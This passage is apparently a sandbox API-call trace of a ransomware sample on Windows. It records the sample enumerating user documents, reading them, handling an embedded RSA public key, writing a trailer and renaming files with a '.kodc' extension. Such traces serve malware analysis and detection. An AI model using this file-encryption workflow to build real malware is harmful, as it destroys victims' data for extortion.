dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.356] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x18145, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x18145, lpOverlapped=0x0) returned 1 [0098.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.356] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1814a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.356] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.356] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.357] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.357] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.357] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.357] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.357] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.357] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.357] CloseHandle (hObject=0x5cc) returned 1 [0098.358] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.358] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0098.358] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.359] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iiPNVu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iipnvu.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iiPNVu.xls.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iipnvu.xls.kodc")) returned 1 [0098.359] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.359] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.359] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.360] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.360] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4109bce0, ftCreationTime.dwHighDateTime=0x1d5c1bb, ftLastAccessTime.dwLowDateTime=0xf934f7e0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0xf934f7e0, ftLastWriteTime.dwHighDateTime=0x1d5c53e, nFileSizeHigh=0x0, nFileSizeLow=0x800c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IrCnDHvtRyHUHGtShK.ppt", cAlternateFileName="IRCNDH~1.PPT")) returned 1 [0098.360] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.361] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.361] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.361] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IrCnDHvtRyHUHGtShK.ppt") returned=".ppt" [0098.361] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IrCnDHvtRyHUHGtShK.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ircndhvtryhuhgtshk.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.361] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=32780) returned 1 [0098.361] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.363] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7fe6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.364] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.364] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.364] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x800c, lpOverlapped=0x0) returned 1 [0098.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.365] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.366] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.366] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.366] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.366] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.366] GetLastError () returned 0x0 [0098.366] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.366] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.366] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.366] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.366] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8010) returned 0x9ba4d90 [0098.366] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d060 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a988 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d0a8 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9a0 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.367] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a9e8 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a9d0 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.368] GetCurrentThreadId () returned 0x42c [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ec08 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.368] GetCurrentThreadId () returned 0x42c [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa00 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.371] HeapFree (in: hHeap=0x630000, 